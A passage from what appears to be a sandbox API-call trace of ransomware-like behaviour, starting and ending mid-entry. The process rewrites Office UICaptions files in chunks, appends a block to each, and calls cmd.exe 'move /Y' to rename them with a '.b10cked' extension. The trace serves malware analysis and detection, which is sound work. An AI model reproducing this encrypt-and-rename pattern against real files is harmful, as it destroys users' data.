lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x1daf, lpOverlapped=0x0) returned 1 [0156.042] SetFilePointer (in: hFile=0x114, lDistanceToMove=-130479, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1fdb1 [0156.042] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.043] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.054] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x1daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x1daf, lpOverlapped=0x0) returned 1 [0156.089] SetFilePointer (in: hFile=0x114, lDistanceToMove=-130479, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1fdb1 [0156.089] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.089] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.090] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x1daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x1daf, lpOverlapped=0x0) returned 1 [0156.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0156.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0156.095] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3fb60 [0156.095] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.096] CloseHandle (hObject=0x114) returned 1 [0156.102] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX") returned 0x3c [0156.103] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.104] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd60, dwThreadId=0x694)) returned 1 [0156.106] CloseHandle (hObject=0x110) returned 1 [0156.106] CloseHandle (hObject=0x114) returned 1 [0156.106] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.106] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21297051072) returned 1 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x37078 [0156.183] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x37560 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x37560 [0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.208] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.228] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.297] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.297] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.297] SetFilePointer (in: hFile=0x114, lDistanceToMove=-113327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bab1 [0156.298] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.298] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.396] SetFilePointer (in: hFile=0x114, lDistanceToMove=-113327, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1bab1 [0156.397] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.397] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xcaaf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xcaaf, lpOverlapped=0x0) returned 1 [0156.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0156.401] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLLIBR.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLLIBR.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0156.401] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x37560 [0156.401] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.401] CloseHandle (hObject=0x114) returned 1 [0156.402] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX") returned 0x3c [0156.403] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.404] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLI~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\OUTLLIBR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd48, dwThreadId=0x514)) returned 1 [0156.405] CloseHandle (hObject=0x110) returned 1 [0156.405] CloseHandle (hObject=0x114) returned 1 [0156.405] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.405] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.405] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.405] ReleaseMutex (hMutex=0xf8) returned 1 [0156.405] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21319528272) returned 1 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.406] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa6560 [0156.407] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.407] 